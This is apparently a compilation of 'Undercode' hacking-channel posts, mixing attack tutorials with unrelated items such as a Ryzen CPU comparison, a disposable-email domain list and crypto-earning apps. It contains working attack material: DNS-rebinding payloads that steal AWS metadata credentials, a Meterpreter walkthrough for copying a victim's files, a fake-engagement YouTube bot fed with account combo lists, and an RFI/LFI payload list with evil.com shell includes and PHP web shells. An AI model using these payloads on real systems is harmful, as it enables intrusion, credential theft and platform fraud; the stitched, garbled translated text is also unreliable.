▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Attacking headless browser :

dref does the heavy-lifting for DNS rebinding. The following snippet from one of its built-in payloads shows the framework being used to scan a local subnet from a hooked browser; after identifying live web services it proceeds to exfiltrate GET responses, breezing through the Same-Origin policy:
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>the git https://github.com/FSecureLABS/dref

// mainFrame() runs first
async function mainFrame () {
// We use some tricks to derive the browser's local /24 subnet
const localSubnet = await network.getLocalSubnet(24)

// We use some more tricks to scan a couple of ports across the subnet
netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
// We launch the rebind attack on live targets
for (let h of results.hosts) {
for (let p of h.ports) {
if (p.open) session.createRebindFrame(h.host, p.port)
}
}
})
}

// rebindFrame() will have target ip:port as origin
function rebindFrame () {
// After this we'll have bypassed the Same-Origin policy
session.triggerRebind().then(() => {
// We can now read the response across origin...
network.get(session.baseURL, {
successCb: (code, headers, body) => {
// ... and exfiltrate it
session.log({code: code, headers: headers, body: body})
}
})
})
}

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Attacking headless browser payload browsers :

1) Getting a Foot in the Door
1n his excellent research into HTTP's "hidden" attack surface, PortSwigger's James Kettle highlighted that some web sites will issue HTTP requests back to Referer URLs logged from incoming traffic. Reasons for doing so could vary from marketing to threat analytics.

2) To facilitate the discovery at scale of websites that exhibit this behavior, MWR built reson8. The tool takes a list of URLs and sends a GET request with spoofed HTTP headers to each URL. For websites that answer back, the tool logs details such as round trip time, User-Agent, and, crucially for this research, whether JavaScript code was executed.

3) Several web sites were found to reach back to the spoofed referrals, with round trip times varying from minutes to days. Observing the logs revealed that a subset of these were reaching out from AWS IP addresses and were doing so with a headless Chrome browser.

4) The use of headless Chrome browsers is likely warranted by the spread of JavaScript-heavy web frameworks; indeed the browsers were found to have JavaScript execution enabled. They also typically used the default page load timeout of 240 seconds. The preliminary conditions for a successful DNS rebinding attack were therefor present in these services.

5) By setting up a dref server and sending a request with a Referer URL pointing to it, it would be possible to execute payloads in the context of the browsers' internal networks. This would allow an attacker to explore the network and exfiltrate information from any HTTP services encountered.

6) Hanging Around
The common, stable, DNS rebinding attack requires a victim browser to remain at least 60 seconds on the payload website. This is due to browsers' built-in DNS cache. Browser-based TCP port scanning techniques also require a similar length of time to sweep a port across a class C subnet.

7) As a headless Chrome process will usually exit when the DOM is loaded, it was necessary to cause the browsers to "hang" long enough to carry out the above activities.

8) This was achieved by embedding an <img> tag that would attempt to fetch an image with a declared Content-Length higher than the actual size of the image. This effectively prevents the load DOM event from firing off, causing Chrome to believe the page has not fully loaded.

9) The ability to cause a browser to hang was added as a configuration key to dref. The Express.js implementation of the /hang.png endpoint itself is quite simple:

// fetch an image that will never fully load
router.get('/hang.png', function (req, res, next) {
res.status(200).set({
'Content-Length': '1'
}).send()
})

10) The following dref payload was written to verify the service was accessible from the browser:

import NetMap from 'netmap.js'
import Session from '../libs/session'

const session = new Session()
const netmap = new NetMap()

function main () {
netmap.tcpScan(['169.254.169.254'], [80, 1234, 4444]).then(results => {
session.log(results)
})
}

main()
If the results of this payload showed port 80 to be open, it could be inferred that the AWS metadata endpoint was accessible to the browser. Ports 1234 and 4444 were also scanned to provide reference points and eliminate a false positive, as these would be expected to be closed.

🦑 The results clearly indicated that port 80 was open and reachable:

"hosts": [
{
"host": "169.254.169.254",
"ports": [
{"port": 80, "delta": 11, "open": true},
{"port": 1234, "delta": 1000, "open": false},
{"port": 4444, "delta": 1001, "open": false}
],
"control": 1001
}
]
Exfiltrating Data across Origins
The AWS metadata endpoint is a read-only service, thus offering no value in CSRF or blind SSRF attacks. To demonstrate a security impact it was necessary to exfiltrate responses from the service.

11) Due to browsers' Same-Origin Policy, it is not possible to directly issue a request from the hooked browser to the AWS metadata endpoint and send the response across origins.

12) DNS rebinding bypasses this policy by dynamically changing the IP address of the attackers domain to point to the desired target. The requirements are that the target service accept any Host header and not be wrapped in SSL/TLS; both requirements are met by the target endpoint.

13) Most DNS rebinding frameworks load the rebinding attacks in iFrames, which is also dref's default behavior. In this case, the target browsers did not appear to load content from iFrames (this appears to be headless Chrome's behavior based on cursory searches).

🦑dref's flexibility allows the payloads to be written in order to conduct the entire attack in the same frame. The following payload takes a single HTTP Path argument and exfiltrates the response from the endpoint back to the attacker:

import * as network from '../libs/network'
import Session from '../libs/session'

const session = new Session()

async function main () {
// configure the A record to point to the AWS metadata endpoint when triggered
network.postJSON(session.baseURL + '/arecords', {
domain: window.env.target + '.' + window.env.domain,
address: '169.254.169.254'
})

session.triggerRebind().then(() => {
// exfiltrate the response from the provided args.path argument
network.get(session.baseURL + window.args.path, (code, headers, body) => {
session.log({code: code, headers: headers, body: body})
})
})
}

main()
AWS Compromise
The security implications from being able to read data from the AWS metadata endpoint are well documented elsewhere and will not be covered in depth here.

14) Requesting the /latest/user-data/ path will return information the developers wish to make accessible to the instances. This is often a bash script that could contain credentials or paths to an S3 bucket, for example:

"data": {
"code": 200,
"body": "
#!/bin/bash -xe
echo 'KUBE_AWS_STACK_NAME=acme-prod-Nodeasgspotpool2-AAAAAAAAAAAA' >> /etc/environment

[...]

run bash -c \"aws s3 --region $REGION cp s3://acme-kube-prod-978bf8d902cab3b72271abf554bb539c/kube-aws/clusters/acme-prod/exported/stacks/node-asg-spotpool2/userdata-worker-4d3482495353ecdc0b088d42510267be8160c26bff0577915f5aa2a435077e5a /var/run/coreos/$USERDATA_FILE\"

[...]

exec /usr/bin/coreos-cloudinit --from-file /var/run/coreos/$USERDATA_FILE
"
}
🦑 In addition to listing an S3 bucket, the output reveals the service is running on Kubernetes, using Amazon's Auto-Scaling Group (ASG) and Spot Instances. The use of Kubernetes possibly offers other paths to exploitation that were not explored during this research.

The main trophy from interaction with the endpoint is the temporary security credentials. A list of available security credentials can be obtained from the /latest/meta-data/iam/security-credentials/ path:

"data": {
"code": 200,
"body": "eu-north-1-role.kube.nodes.asgspot2"
}
These credentials can be obtained by requesting /latest/meta-data/iam/security-credentials/eu-north-1-role.kube.nodes.asgspot2:

"data": {
"code": 200,
"body": "
\"Code\" : \"Success\",
\"LastUpdated\" : \"2018-08-05T15:33:26Z\",
\"Type\" : \"AWS-HMAC\",
\"AccessKeyId\" : \"AKIAI44QH8DHBEXAMPLE\",
\"SecretAccessKey\" : \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",
\"Token\" : \"AQoDYXdzEJr[....]\",
\"Expiration\" : \"2018-08-05T22:00:54Z\"
"
}"
These can then be used to authenticate to the AWS API:

$ export AWS_ACCESS_KEY_ID=AKIAI44QH8DHBEXAMPLE
$ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
$ export AWS_SESSION_TOKEN=AQoDYXdzEJr[...]

$ aws ec2 describe-instances
[...]

🦑 The extent of the impact is determined by the permissions granted with the credentials. This can range from complete compromise to information disclosure. Even with low privileges, attackers may be able to leverage such access to uncover additional attack paths or escalate their privileges.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Comparison of Ryzen 5 3600 and 3600X: which one to buy
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) At $ 200, the Ryzen 5 3600 processor with 6 cores and 12 threads is a very good buy. It is ahead of the 9600K in multi-core benchmarks and is great for gaming. 1% of the minimum productivity is higher, while the price is lower.

2) However, potential buyers are wondering if it is worth taking the Ryzen 5 3600 or better model 3600X?

3) Since its release, the new AMD processors have been constantly ranked among the best in terms of features and price and are in the greatest demand in the Amazon store. To decide, you have to conduct tests.

🦑 The R5 3600 now costs $ 175, while the 3600X is offered at 20% more expensive at a price of $ 212. At the time sales began in mid-2019, processors were $ 50 more expensive. The following conclusions can be drawn from the tests of two processors:

1) Ryzen 5 3600 priced at $ 175 would be the best choice for most buyers.
At the base clock frequency, the 3600X offers a very slight increase in performance, by 5% or lower, compared to the regular 3600. This difference does not justify a cost increase of $ 37.

2) Overclocking of two processors is approximately the same, with a slight increase in performance.

3) As you can understand from the full reviews, the Ryzen 5 3600 has an excellent ratio of features and price and works even on the simplest motherboards based on B350 / B450 chipsets.

4) The 3600X comes with a better cooler, but instead of spending almost $ 40 more on this processor, it is recommended to buy 3600 and a Cooler Master 212 cooler for $ 30, which will be more efficient.

5) Deceptive TDP ratings. The only thing that allows us to rank the R5 3600 as a processor with a TDP of 65 W is its cooling system. The same can be said of the 3600X. The rest of the processors are identical.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Youtube bot for auto-like and auto-subscribe 2020
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1)https://github.com/BitTheByte/YouTubeShop

2) cd YouTubeShop

4) $ pip install requests

5) $ pip install colorama

6) $ pip install selenium

7) $ python yt.py

8) Your emails combo file should follow this format e.g[ accounts.txt ]

email0@domain.com:0123456789
email1@domain.com:0123456789
email2@domain.com:0123456789

🦑Require :

>Fast internet connection

>2 Files [Emails Combo, Action File]

🦑Multiple Videos Example
ciM6wigZK0w
ineO1tIyPfM
XnEqfTjp66A

> Multiple Channels Example
UCs4aHmggTfFrpkPcWSaBN9g
UCzEnk4KWFlSj_PjXLz0-GMA
UCto7D1L-MiRoOziCXK9uT5Q

🦑For fix some commun errors
Post a comment (Scheduled to the next public release)(Delayed)
Post a random comment based on channel's comments and users
Local proxy connection (For debugging) ✓
Local web sever to manage the ouput instead of the console
Advanced debugging mode for advanced users ✓
Migrate to module instead of single .py file

🦑Tested by Undercode

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 temporary-email-address-domains :
twitter.com/undercodeNews

a-bc.net
afrobacon.com
ajaxapp.net
amilegit.com
amiri.net
amiriindustries.com
anonbox.net
anonymbox.com
antichef.com
antichef.net
antispam.de
baxomale.ht.cx
beefmilk.com
binkmail.com
bio-muesli.net
bobmail.info
bodhi.lawlita.com
bofthew.com
brefmail.com
broadbandninja.com
bsnow.net
bugmenot.com
bumpymail.com
casualdx.com
centermail.com
centermail.net
mailnull.com
mailshell.com
mailsiphon.com
mailslite.com
mailzilla.com
mailzilla.org
mbx.cc
mega.zik.dj
meinspamschutz.de
meltmail.com
messagebeamer.de
mierdamail.com
mintemail.com
moburl.com
moncourrier.fr.nf
monemail.fr.nf
monmail.fr.nf
msa.minsmail.com
mt2009.com
mx0.wwwnew.eu
mycleaninbox.net
mypartyclip.de
myphantomemail.com
myspaceinc.com
myspaceinc.net
myspaceinc.org
myspacepimpedup.com
myspamless.com
mytrashmail.com
neomailbox.com
nepwk.com
nervmich.net
nervtmich.net
netmails.com
netmails.net
netzidiot.de
neverbox.com
no-spam.ws
nobulk.com
noclickemail.com
nogmailspam.info
nomail.xl.cx
nomail2me.com
nomorespamemails.com
nospam.ze.tc
nospam4.us
nospamfor.us
nospamthanks.info
notmailinator.com
nowmymail.com
nurfuerspam.de
nus.edu.sg
nwldx.com
objectmail.com
obobbo.com
oneoffemail.com
onewaymail.com
online.ms
oopi.org
ordinaryamerican.net
otherinbox.com
ourklips.com
outlawspam.com
ovpn.to
owlpic.com
pancakemail.com
pimpedupmyspace.com
pjjkp.com
politikerclub.de
poofy.org
pookmail.com
privacy.net
proxymail.eu
prtnx.com
punkass.com
PutThisInYourSpamDatabase.com
qq.com
quickinbox.com
rcpt.at
recode.me
recursor.net
regbypass.com
regbypass.comsafe-mail.net
rejectmail.com
rklips.com
rmqkr.net
rppkn.com
rtrtr.com
s0ny.net
safe-mail.net
safersignup.de
safetymail.info
safetypost.de
sandelf.de
saynotospams.com
selfdestructingmail.com
SendSpamHere.com
sharklasers.com
shiftmail.com
shitmail.me
shortmail.net
sibmail.com
skeefmail.com
slaskpost.se
slopsbox.com
smellfear.com
snakemail.com
sneakemail.com
sofimail.com
sofort-mail.de
sogetthis.com
soodonims.com
spam.la
spam.su
spamavert.com
spambob.com
spambob.net
spambob.org
spambog.com
spambog.de
spambog.ru
spambox.info
spambox.irishspringrealty.com
spambox.us
spamcannon.com
spamcannon.net
spamcero.com
spamcon.org
spamcorptastic.com
spamcowboy.com
spamcowboy.net
spamcowboy.org
spamday.com
spamex.com
spamfree24.com
spamfree24.de
spamfree24.eu
spamfree24.info
spamfree24.net
spamfree24.org
SpamHereLots.com
SpamHerePlease.com
spamhole.com
spamify.com
spaminator.de
spamkill.info
spaml.com
spaml.de
spammotel.com
spamobox.com
spamoff.de
spamslicer.com
spamspot.com
spamthis.co.uk
spamthisplease.com
spamtrail.com
speed.1s.fr
supergreatmail.com
supermailer.jp
suremail.info
teewars.org
teleworm.com
tempalias.com
tempe-mail.com
tempemail.biz
tempemail.com
TempEMail.net
tempinbox.co.uk
tempinbox.com
tempmail.it
tempmail2.com
tempomail.fr
temporarily.de
temporarioemail.com.br
temporaryemail.net
temporaryforwarding.com
temporaryinbox.com
thanksnospam.info
thankyou2010.com
thisisnotmyrealemail.com
throwawayemailaddress.com
tilien.com
tmailinator.com
tradermail.info
trash-amil.com
trash-mail.at
trash-mail.com
trash-mail.de
trash2009.com
trashemail.de
trashmail.at
trashmail.com
trashmail.de
trashmail.me
trashmail.net
trashmail.org
trashmail.ws
trashmailer.com
trashymail.com
trashymail.net
trillianpro.com
turual.com
twinmail.de
tyldd.com
uggsrock.com
upliftnow.com
uplipht.com
venompen.com
veryrealemail.com
viditag.com
viewcastmedia.com
viewcastmedia.net
viewcastmedia.org
webm4il.info
wegwerfadresse.de
wegwerfemail.de
wegwerfmail.de
wegwerfmail.net
wegwerfmail.org
wetrainbayarea.com
wetrainbayarea.org
wh4f.org
whyspam.me
willselfdestruct.com
winemaven.info
wronghead.com
wuzup.net
wuzupmail.net
www.e4ward.com
www.gishpuppy.com
www.mailinator.com
wwwnew.eu
xagloo.com
xemaps.com
xents.com
xmaily.com
xoxy.net
yep.it
yogamaven.com
yopmail.com
yopmail.fr
yopmail.net
ypmail.webarnak.fr.eu.org
yuurok.com
zehnminutenmail.de
zippymail.info
zoaxe.com
zoemail.org

@undercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Android playstore and ios apple store Apps That Pay You Bitcoin and Other Cryptocurrency :
pinterest.com/undercode_testing


1) Sweatcoin
Sweatcoin is another free app that is available on both iOS and Android.

With this app, you can earn cryptocurrency (Sweatcoins) by walking. The app tracks your steps and you get paid based on how many you take.
>https://sweatco.in/track?dp=%2F&ea=redirect&ec=Store&el=AppStore&params=%7B%22from%22%3A%22Web%22%2C%22campaign%22%3A%22website_home%22%7D&url=https%3A%2F%2Fitunes.apple.com%2Fapp%2Fsweatcoin-app-that-pays-you%2Fid971023427%3Fct%3Dwebsite_home%26mt%3D8%26pt%3D117705952

> https://sweatco.in/track?dp=%2F&ea=redirect&ec=Store&el=GooglePlay&params=%7B%22from%22%3A%22Web%22%2C%22campaign%22%3A%22website_home%22%7D&url=https%3A%2F%2Fplay.google.com%2Fstore%2Fapps%2Fdetails%3Fid%3Din.sweatco.app%26referrer%3Dutm_campaign%253Dwebsite_home%2526utm_source%253Dwebsite


2) Free Bitcoin
This app is also available on both Android and iOS. It lets you earn Satoshi/Bitcoin by watching videos, playing mobile games, etc.
>https://play.google.com/store/apps/details?id=weekend.bitcoin.free&hl=en_US

>https://itunes.apple.com/us/app/bitcoin-free/id999004027?mt=8

3) Blockchain Game
Blockchain Game is a free app that is available only for Android. It lets you earn Satoshi/Bitcoin by playing games where you do things like build a blockchain out of virtual blocks.
>https://play.google.com/store/apps/details?id=bitcoin.blockchain.game&hl=en_US


4) Alien Run
This is another mobile game available for both Android and iOS. With Alien Run, you can earn Bitcoin by just playing the game where you basically are running through an obstacle course.

>https://play.google.com/store/apps/details?id=bitcoin.alien.run&hl=en_US

> https://itunes.apple.com/us/app/bitcoin-alien-run/id1161356630?mt=8

5) Abundance
Abundance is an app that is available for Android only. It lets you earn Bitcoin by playing games and unlocking quotes about money and success. Every time you unlock a new quote you earn more money.
> https://play.google.com/store/apps/details?id=app.bitcoin.abundance

6)Cloud Bitcoin Miner
This app is also available for Android only. It allows you to do virtual Bitcoin mining.
>https://play.google.com/store/apps/details?id=my.mine.btc&hl=en_US

7) Super Satoshi
With this Android app, you can earn Bitcoin by playing games, participating in daily contests, and referring friends (earn 5% of whatever they earn).
> https://play.google.com/store/apps/details?id=com.cryptbase.supersatoshi&hl=en_US

9)Lympo
With Lympo on your iOS device, you can earn cryptocurrency (called LYM) by walking or running. The app tracks your steps and you can use what you earn towards items like workout gear.
>https://itunes.apple.com/us/app/lympo-walk-run-earn/id1423003823?mt=8

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Downloading files from a victim with Metasploit Meterpreter scripts :
t.me/undercodetesting


1) >The Meterpreter shell has a lot of neat features, including encryption of all the traffic between our attacking system and target. This prevents any interception and scanning of the data from intrusion detection systems (IDS).

2) Downloading individual files:

From the Meterpreter console it is possible to download individual files using the "download" command. Which is pretty straightforward and easy if you only want to download one file.
Meterpreter has a lot of useful inbuilt scripts to make post exploitation tasks such as data collection easier. To view the options, simply type "run" and then space-tab-tab to see the auto-completion options:

et's look at "run file_collector" first:

3) In the example below, I wanted to copy all the data from the E: drive of a Windows target, with the exception of a couple of directories that I am not interested in.
(In this actual example I am copying some files from a "Teach yourself C for Linux in 21 days" CD which is in the drive on the target system, onto my attacking system ;o)

3) To view the "run file_collector" options, use "-h"

meterpreter > run file_collector -h
Meterpreter Script for searching and downloading files that
match a specific pattern. First save files to a file, edit and
use that same file to download the choosen files.

🦑 OPTIONS:

-d Directory to start search on, search will be recursive.
-f Search blobs separated by a |.
-h Help menu.
-i Input file with list of files to download, one per line.
-l Location where to save the files.
-o Output File to save the full path of files found.
-r Search subdirectories.


meterpreter >

5) As you can see in the description, this is a three stage process. First, we create a file list, then we remove any files we don't want from the list, then we execute the download process.

6) Creating the file list

run file_collector -r -d e:\\ -f * -o /root/Courses/CforLinux/file.txt

We are running the collector recursively, looking for all files on the E: drive, and storing a list of these files in a "file.txt" file on my attacking system.

🦑As Meterpreter copies files over an encrypted connection, this can make the data transfer slower, so best to strip out any unneeded files.

Editing the file list

I don't need some of the directories on the target data drive, so I use grep to remove these, and make a new file "file.lst".

cat /root/Courses/CforLinux/file.txt | grep -v \DDD | grep -v \GCC | grep -v \GDB | grep -v \MAKE > file.lst2

(I am removing the \DDD \GCC \GDB \MAKE directories, which is not particularly relevant to you, just an example. I am chopping two carrots with one knife here, as this was useful to me at the time ;o)

🦑Downloading the file list

Once we have the edited file list we can simply start the file download process with the following command:

run file_collector -i /root/Courses/CforLinux/file.lst -l /root/Courses/CforLinux/


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NEWS VIRUS What is the danger of the Reannewscomm.Com virus and how can it be removed by undercode :
instagram.com/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

>What is Reannewscomm.com virus?

1) The Reannewscomm.com virus is a browser cracker that installs on the system without the user's knowledge.

2) The main goal of this unwanted software is to display illegal advertising in any possible way, including sudden redirection to malicious sites, displaying pop-ups and so on. At the same time, this process cannot be stopped even with the help of ad blockers, including AdGuard.

3) Initially, such activity may seem harmless, but displaying advertising messages is only a cover for gaining access to important personal information, which can later be used to steal passwords from electronic wallets and other confidential data of the PC owner.

🦑 How does the Reannewscomm.com virus work?

1) This malware acts by changing the settings in your web browser, which allows you to install a small utility in your Internet browser. The following is usually offered to buy something using e-wallets or debit cards, which, after entering data, scammers get unlimited access.

2) Moreover, “Reannewscomm.com” can use the “keylogger” tactics to capture information that you enter into the browser from the keyboard while working with legal sites, which can also be used by attackers on your behalf.

🦑How do I know if my computer is infected with the Reannewscomm.com virus?

1) Detecting Reannewscomm.com is quite simple, as its activity is accompanied by the display of a large amount of malicious advertising content, the constant appearance of pop-up browser windows, and so on.

2)In addition, you can immediately notice that your reliable ad blocker no longer works. Moreover, you can feel a significant drop in the speed of the browser and the entire system, as a result of the sudden sudden opening of many tabs.

3) Your antivirus program will often display a pop-up message stating that “The threat has been blocked.” If this happens, you should see the phrase “reannewscomm.com” in the corresponding warning.

4) Further, it is important to immediately remove this threat using your scanner, and if this fails, then you should try using alternative developers' antivirus software.

🦑Where did the Reannewscomm.com virus appear on my computer?
Browser crackers, such as Reannewscomm.com, are often installed along with free or pirated programs that users download voluntarily. Hackers who create this type of unwanted software usually embed it in legitimate software available for download on popular websites. In addition, such viruses may be hidden in notifications during installation with a request to approve the installation of additional components.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑WINDOWS 7 MICROSOFT 2020 new
+ New update for fix a bug in win 7
ALL VERSION BYPASS LINKS IN MICROSOFY WITHOUT KEY 😁 BY UNDERCODE 2020
t.me/UndercOdeTesting

>No-Need for Product Key To Download from Microsoft

🦑 X64 ALL:

> https://download.microsoft.com/download/5/1/9/5195A765-3A41-4A72-87D8-200D897CBE21/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_ULTIMATE_x64FRE_en-us.iso

🦑X32 ALL:

> https://download.microsoft.com/download/1/E/6/1E6B4803-DD2A-49DF-8468-69C0E6E36218/7601.24214.180801-1700.win7sp1_ldr_escrow_CLIENT_ULTIMATE_x86FRE_en-us.iso


@UndercOdeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Saudi uses SS7 vulnerability to monitor the location and information of any mobile phone user in the United States
recently from undercode tweets 😳
twitter.com/undercodeNews

1) Lawmakers and security experts continue to warn that there are many security risks to global cellular networks. A whistleblower recently said that the Saudi government used these loopholes in tracking "systematic" surveillance activities to track the information of any US citizen.

2) Systematic is a large-scale Saudi surveillance of overseas citizens, using powerful mobile spyware to invade dissidents and activists' phones to monitor their activities. Among them is the Washington Post columnist Jamal Khashoggi, who was killed by a Saudi agent team in the consulate in 2018.

3) According to a data cache obtained by the British Guardian , the location information of millions of Saudi citizens has been recorded for the four months starting in November last year. It is reported that these location tracking information was executed by the three major mobile phone operators in Saudi Arabia through the SS7 (Signaling System Number 7) vulnerability, and there is reason to believe that there is a shadow of the Saudi government.

4) The SS7 signaling system is a common-path signaling system that is widely used in modern communication networks such as public switched telephone networks and cellular communication networks. SS7 is the standard signaling system recommended by the International Telecommunication Union. This is why T-Mobile users can call AT & T users or send text messages to Verizon users.

Written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 RFI/LFI Payload List :exploit
t.me/undercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) As with many exploits, remote and local file inclusions are only a problem at the end of the encoding. Of course it takes a second person to have it. Now this article will hopefully give you an idea of protecting your website and most importantly your code from a file iclusion exploit. I’ll give code examples in PHP format.

2) Let’s look at some of the code that makes RFI / LFI exploits possible.

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>

3) Now obviously this should not be used. The $ page entry is not fully cleared. $ page input is directed directly to the damn web page, which is a big “NO”. Always remove any input passing through the browser. When the user clicks on “File” to visit “files.php” when he visits the web page, something like this will appear.

http: //localhost/index.php? page = files.php

4) Now if no one has cleared the input in the $ page variable, we can have it pointed to what we want. If hosted on a unix / linux server, we can display the password as configuration files for shaded or uncleaned variable input.

5) Viewing files on the server is a “Local File Inclusion” or LFI exploit. This is no worse than an RFI exploit.

http: //localhost/index.php? page = .. / .. / .. / .. / .. / .. / etc / passwd
The code will probably return to / etc / passwd. Now let’s look at the RFI aspect of this exploit. Let’s get some of the codes we’ve taken before.

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = $ _GET [page];
include ($ page);
?>

6) Now suppose we write something like …

http: //localhost/index.php? page = http: //google.com/
Probably where the $ page variable was originally placed on the page, we get the google.com homepage. This is where the codder can be hurt. We all know what c99 (shell) can do, and if coders are careful, they may be included in the page, allowing users to surf through sensitive files and contacts at the appropriate time. Let’s look at something simpler that can happen on a web page. The faster and more dirty use of RFI exploitation is to your advantage. Now, create a file named “test.php” and put the following code in it and save it.


<? Php
passthru ($ _ GET [cmd]);
?>


7) Now this file is something you can use to your advantage to include it on a page with RFI exploitation. The passthru () command in PHP is very evil, and many hosts call it “out of service for security reasons”. With this code in test.php, we can send a request to the web page, including file inclusion exploit.

http: //localhost/index.php? page = http: //someevilhost.com/test.php

8) When the code makes a $ _GET request, we must provide a command to pass to passthru (). We can do something like this.

http: //localhost/index.php? page = http: //someevilhost.com/test.php? cmd = cat / etc / passwd

9) This unix machine will also extract the file / etc / passwd using the cat command. Now we know how to exploit RFI exploit, now we need to know how to hold it and make it impossible for anyone to execute the command, and how to include remote pages on your server. First, we can disable passthru (). But anything on your site can use it again (hopefully not). But this is the only thing you can do. I suggest cleaning the inputs as I said before. Now, instead of just passing variables directly to the page, we can use a few PHP-proposed structures within functions. Initially, chop () from perl was adapted to PHP, which removes whitespaces from an array. We can use it like this.

<a href=index.php?page=file1.php> Files </a>
<? Php
$ page = chop ($ _ GET [page]);
include ($ page);
?>

10) There are many functions that can clear string. htmlspecialchars () htmlentities (), stripslashes () and more. In terms of confusion, I prefer to use my own functions. We can do a function in PHP that can clear everything for you, here I’ve prepared something easy and quick about this course for you.

<? Php
function cleanAll ($ input) {
$ input = strip_tags ($ input);
$ input = htmlspecialchars ($ input);
return ($ input);
}
?>

11) Now I hope you can see what’s going on inside this function, so you can add yours. I would suggest using the str_replace () function and there are a lot of other functions to clear them. Be considerate and stop the RFI & LFI exploit frenzy!

Basic LFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=etc/passwd
http://example.com/index.php?page=etc/passwd%00
http://example.com/index.php?page=../../etc/passwd
http://example.com/index.php?page=%252e%252e%252f
http://example.com/index.php?page=....//....//etc/passwd
Interesting files to check out :

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
Basic RFI (null byte, double encoding and other tricks) :
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
LFI / RFI Wrappers :
LFI Wrapper rot13 and base64 - php://filter case insensitive.

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php


12) Can be chained with a compression wrapper.
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
LFI Wrapper ZIP :
echo "</pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php
RFI Wrapper DATA with "" payload :
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
RFI Wrapper EXPECT :
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
XSS via RFI/LFI with "" payload :
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+
LFI to RCE via /proc/*/fd :
Upload a lot of shells (for example : 100)
Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
LFI to RCE via Upload :
http://example.com/index.php?page=path/to/uploaded/file.png

@undercodeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁